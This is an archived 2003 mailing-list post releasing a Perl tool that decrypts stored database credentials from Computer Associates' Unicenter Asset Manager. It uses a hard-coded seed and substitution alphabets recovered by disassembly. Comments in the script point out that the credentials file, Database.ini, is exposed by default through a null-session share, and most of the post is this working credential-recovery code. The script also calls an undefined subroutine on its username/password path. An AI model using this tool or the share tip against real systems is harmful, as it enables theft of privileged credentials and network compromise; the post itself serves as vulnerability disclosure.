CA Unicenter Password Recovery Tool

From: Tor Houghton (infoat_private)
Date: Wed Jun 04 2003 - 08:27:17 PDT

  • Next message: Immunix Security Team: "Immunix Secured OS 7+ file update" 

    List,

The following can also be found at:

	http://www.kufumo.com/releases/ca-passwordrecover.txt

Thanks,

Tor Houghton

;

$Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $

        Computer Associates "Asset Manager" Password Recovery Tool

              (c) 2003 Tor Houghton (th at kufumo dot com)


++Synopsis++

The Computer Associates' Unicenter Asset Manager(TM) software uses a stored 
secret in order to decrypt stored passwords. Attached to this text is a tool 
to decrypt these passwords.


++What++

(http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194)

Simply put, it is a data collector with extended privileges. It is comprised
of an "Engine" (and a database), one or more "Sectors", a "Console" and an 
"Agent" for each device (Windows or UNIX) that is to be added to the asset 
database (see fig 1).

                           [Console]       +-------- [Agent]
                              |            |
                              v            v
            [Database] <-- [Engine] --> [Sector] <-- [Agent]
                              |
                              +-------> [Sector] <-- [Agent]
                                           ^
                                           |
                                           +-------- [Agent]

                               (figure 1)

The arrows do not depict data flow, but transaction flow. For example, the 
Agents do get data from the Sector (and deliver data to it), but the Agent 
initiates this transaction.

The Engine issues jobs and collects results (both stored on the Sector) and
the Agent executes these.

On the whole, this looks like a nice design; you could easily firewall the 
Engine, Console and Database from the rest of the network, for example. 
However, the Sector is (by default) a NULLSESSION share, writable by anyone.

Anyway. This document is not about whether or not it is possible to compromise
any machine with an Agent on it through a Sector, but to release a password 
recovery tool.

Here it is.

--

#!/usr/bin/perl
$version='ca-dbpwrecover 1.2 2003/03/19';
##
## (c) th at kufumo.com 2003
##
## this version was based on AMO Unicenter 3.2
##
## thanks to emf at kufumo.com and ssw at kufumo.com for help with the 
## disassembly and helping to reverse the encoding algorithm! go daddy!
## 
## can't find a suitable file?
##
## (a default installation has the file 'Database.ini' available via a 
## nullsession share ("amdomain$") on the machine running the console/
## engine.)
##
##
$|=1;
##

$ironic_seed="NetCon"; ## we predict $ironic_seed will change
                       ## in the next version of CA AMO etc.

$CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv";
$CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";

use Getopt::Long;

GetOptions("h",
           "u=s" => \$uname,
           "p=s" => \$pword,
           "f=s" => \$file);

if($opt_h) {
    print <<EOM;
$version (c) 2003 th at kufumo.com
usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>]
  -h : this
  -p : password (if not using files)
  -u : username (if not using files)
  -f : filename (e.g. 'ca-dbpwrecover -f Database.ini')
EOM
    exit(1);
}

if($file) {
    DecryptCAEncryption("","",$file);
} else {
    if($pword && $uname) {
        DecryptCADecryption($pword,$uname,"");
        exit(0);
    } else {
        print "Not enough parameters. Try -h.\n";
        exit(1);
    }
}

exit();

sub DecryptCAEncryption {
    my($pword,$uname,$file)=@_;

    my($u,$c,$oa,$ob,$offset);

    my(@crypt)=split(//,$CRYPT);

    if($file) {
        open(IN,$file) || die "error: failed to open $file: $!\n";
        while(<IN>) {
            if(/^UserName=\#(\S+)\s*$/) {$name=$1;}
            if(/^Password=\#(\S+)\s*$/) {$pass=$1;} 
        }
        close(IN);
    }

    $uname=$name if($name);
    $pword=$pass if($pass);

    @pass=split(//,$pword);
    @user=split(//,$uname);

    @nc=split(//,$ironic_seed);

    print "Username: ";

    $c=5;
    for($u=0;$u<@user;$u++) {

        ## find occurrance of current char ($user[$u]) in cleartext
        ## keystring:

        $_=$CLEAR;

        while(m/$user[$u]/g) {
            $oa=pos;
        }

        $oa++;

        if($u<@nc) {
            $_=$CRYPT;
            while(m/$nc[$u]/g) {
                $ob=pos;
            }
            $ob++;
            $oa=$oa+($ob*-1);
        } else {
            $oa=$oa-$u+$c;
            $c++;
        }

        while($oa<0) {
            $oa=$oa+62;
        }
        while($oa>62) {
            $oa=$oa-62;
        }

        $oa--;

        push(@clear,$crypt[$oa-1-$u]);

    }

    foreach(@clear) {
        print $_;
    }

    print "\n";

    ## who said reuse of code is a good thing?
    ## i think i failed class here. heck, did you want the tool or not?
    ##

    print "Password: ";

    $c=@clear;

    for($u=0;$u<@pass;$u++) {

        ## find occurrance of current char ($user[$u]) in cleartext
        ## keystring:

        $_=$CLEAR;

        while(m/$pass[$u]/g) {
            $oa=pos;
        }
        $oa++;

        if($u<@clear) {
            $_=$CRYPT;
            while(m/$clear[$u]/g) {
                $ob=pos;
            }
            $ob++;
            $oa=$oa+($ob*-1);
        } else {
            $oa=$oa-$u+$c-1;
            $c++;
        }

        while($oa<0) {
            $oa=$oa+62;
        }
        while($oa>62) {
            $oa=$oa-62;
        }

        $oa--;

        push(@cpass,$crypt[$oa-1-$u]);

    }

    foreach(@cpass) {
        print $_;
    }

    print "\n";

}

    This archive was generated by hypermail 2b30 : Wed Jun 04 2003 - 09:12:43 PDT